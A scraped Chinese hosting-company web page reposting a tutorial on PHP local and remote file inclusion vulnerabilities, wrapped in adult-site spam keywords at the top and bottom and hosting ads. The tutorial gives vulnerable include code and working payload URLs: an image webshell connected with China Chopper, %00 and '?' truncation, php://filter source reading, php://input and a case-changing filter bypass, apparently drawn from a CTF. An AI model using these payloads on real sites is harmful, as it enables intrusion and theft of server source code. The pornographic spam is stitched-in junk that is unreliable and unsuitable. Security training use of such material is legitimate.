欧美一级特黄大片做受成人-亚洲成人一区二区电影-激情熟女一区二区三区-日韩专区欧美专区国产专区

文件包含漏洞之本地包含和遠程包含-創(chuàng)新互聯(lián)

文件包含漏洞介紹:

目前創(chuàng)新互聯(lián)建站已為近1000家的企業(yè)提供了網(wǎng)站建設(shè)、域名、雅安服務(wù)器托管、網(wǎng)站托管、企業(yè)網(wǎng)站設(shè)計、措美網(wǎng)站維護等服務(wù),公司將堅持客戶導(dǎo)向、應(yīng)用為本的策略,正道將秉承"和諧、參與、激情"的文化,與客戶和合作伙伴齊心協(xié)力一起成長,共同發(fā)展。

  程序開發(fā)人員一般會把重復(fù)使用的函數(shù)寫到單個文件中,需要使用某個函數(shù)時直接調(diào)用此文件,而無需再次編寫,這中文件調(diào)用的過程一般被稱為文件包含。程序開發(fā)人員一般希望代碼更靈活,所以將被包含的文件設(shè)置為變量,用來進行動態(tài)調(diào)用,但正是由于這種靈活性,從而導(dǎo)致客戶端可以調(diào)用一個惡意文件,造成文件包含漏洞。幾乎所有腳本語言都會提供文件包含的功能,但文件包含漏洞在PHP中居多,而在JSP、ASP、ASP.NET程序中卻非常少,甚至沒有,這是有些語言設(shè)計的弊端。在PHP中經(jīng)常出現(xiàn)包含漏洞,但這并不意味這其他語言不存在。

漏洞成因:

  文件包含漏洞的產(chǎn)生原因是在通過引入文件時,引用的文件名,用戶可控,由于傳入的文件名沒有經(jīng)過合理的校驗,或者校驗被繞過,從而操作了預(yù)想之外的文件,就 可能導(dǎo)致意外的文件泄露甚至惡意的代碼注入。當被包含的文件在服務(wù)器本地時,就形成的本地文件包含漏洞,被包涵的文件在第三方服務(wù)是,就形成了遠程文件包 含漏洞。

漏洞危害:

    執(zhí)行惡意代碼、包含惡意文件控制網(wǎng)站、甚至控制網(wǎng)站服務(wù)器等。


本地包含漏洞:

代碼:

<?PHP $file=@$_GET['name']; if($file){ include $file; } ?>

    

以以上這個代碼為例:

訪問:http://127.0.0.1/fileupload/include.php?name=1.txt

  1. txt文件代碼為:

<?php phpinfo(); ?>

我們可以看到txt文件里的內(nèi)容以php文件的方式執(zhí)行了;如下圖所示:

文件包含漏洞之本地包含和遠程包含

再看,如果訪問:http://127.0.0.1/fileupload/include.php?name=2.jpg

2.jpg是一個圖片的一句話***;

文件包含漏洞之本地包含和遠程包含

用菜刀可以直接連接,也就是說不管后綴是什么樣,最后都會以php的形式執(zhí)行。


但是有時候會這樣,這個在ISCC國賽中遇到了,就是在最后會自動加入.php,非常煩人。

代碼2:

<?php     Include  $_GET['page'].".php" ?>

執(zhí)行結(jié)果如下圖:

文件包含漏洞之本地包含和遠程包含

如果訪問:http://127.0.0.1/fileupload/include2.php?page=1.txt

還是報錯。

文件包含漏洞之本地包含和遠程包含

解決辦法:%00截斷

利用環(huán)境:php版本<5.3magic_quotes_gpc取消的(magic_quotes_gpc = off)

訪問:http://127.0.0.1/fileupload/include2.php?page=1.txt%00

文件包含漏洞之本地包含和遠程包含


遠程包含:

  遠程的文件名不能為php可解析的擴展名(php、php5..),而且php.ini中allow_url_fopen和allow_url_include為On才可以。

訪問:http://127.0.0.1/fileupload/include.php?name=http://127.0.0.1/1.txt

文件包含漏洞之本地包含和遠程包含

如果是遇到這種情況:

文件包含漏洞之本地包含和遠程包含可以用“?”或者“%00”階段;

http://127.0.0.1/fileupload/include2.php?page=http://127.0.0.1/1.txt?


讀取源碼:php://filter/read=convert.base64-encode/resource=1.txt

http://127.0.0.1/fileupload/include.php?name=php://filter/read=convert.base64-encode/resource=1.txt

讀取出來的是base64編碼的,進行解碼就行了。

文件包含漏洞之本地包含和遠程包含

php://input的用法

php://input

文件包含漏洞之本地包含和遠程包含

偽協(xié)議繞過大小寫:

<?php          if(isset($_GET['f'])){         if(strpos($_GET['f'],"php") !== False){             die("error...");         }         else{             include($_GET['f'] . '.php');         }     }      ?>

http://127.0.0.1//index.php?f=pHP://filter/read=convert.base64-encode/resource=index

readfile讀取文件,不可以getshell

<?php  @readfile($_GET["file"]); ?>

總結(jié):這些在iscc的國賽賽中出現(xiàn)過,如果當時會階段或者會讀取源碼,也就能獲獎了,學(xué)無止境,加油吧。


文件包含漏洞之本地包含和遠程包含

另外有需要云服務(wù)器可以了解下創(chuàng)新互聯(lián)cdcxhl.cn,海內(nèi)外云服務(wù)器15元起步,三天無理由+7*72小時售后在線,公司持有idc許可證,提供“云服務(wù)器、裸金屬服務(wù)器、高防服務(wù)器、香港服務(wù)器、美國服務(wù)器、虛擬主機、免備案服務(wù)器”等云主機租用服務(wù)以及企業(yè)上云的綜合解決方案,具有“安全穩(wěn)定、簡單易用、服務(wù)可用性高、性價比高”等特點與優(yōu)勢,專為企業(yè)上云打造定制,能夠滿足用戶豐富、多元化的應(yīng)用場景需求。

網(wǎng)站欄目:文件包含漏洞之本地包含和遠程包含-創(chuàng)新互聯(lián)
文章分享:http://aaarwkj.com/article16/csoidg.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供靜態(tài)網(wǎng)站外貿(mào)建站、品牌網(wǎng)站建設(shè)微信公眾號、網(wǎng)站營銷、網(wǎng)站建設(shè)

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

h5響應(yīng)式網(wǎng)站建設(shè)
18以下的人禁止看的视频| 性激烈的欧美三级男同| 两性色午夜视频免费网站| 日韩成人一级片在线观看| 成人免费毛片内射视频| 久久九九亚洲欧美中文字幕| 日本特黄特色大片免费| 国产精品情侣av自拍| 少妇又色又爽又高潮欧美| 白白色最新福利视频二| 国产又爽又乱的视频在线| 欧美精品福利一区二区三区| 性生活免费在线观看视频| 自偷自拍亚洲综合精品| 亚洲丰满毛茸茸毛茸茸| 久久精品国产亚洲av一| 正在播放老肥熟妇露脸| 天堂av在线免费观看| 国产又粗又长在线视频| 国产无套内射三级视频| 久久综合久久狠狠激情| 高清av网站大全网站| 丝袜美腿蜜汁一龙二凤| 日韩在线国产亚洲精品| 日本一区二区不卡视频在线播放| 少妇的诱惑免费在线播放| 国产免费久久黄av片| 99久久久久国产精品免费| 久久精品国产亚洲av热老太| 国产亚洲欧美精品在线观看| 91高清视频在线免费观看| 日韩中文字幕视频一区| 91久久国产免费网站| 日本师生三片在线观看| 丰满的熟妇女教师水多| 偷拍丝袜美腿在线观看| 亚洲精品人妻av在线| 中文字幕人成乱码在线观看| 偷窥偷拍视频一区二区| 国产精品欧美一区二区视频| 亚洲一区二区中文字幕av|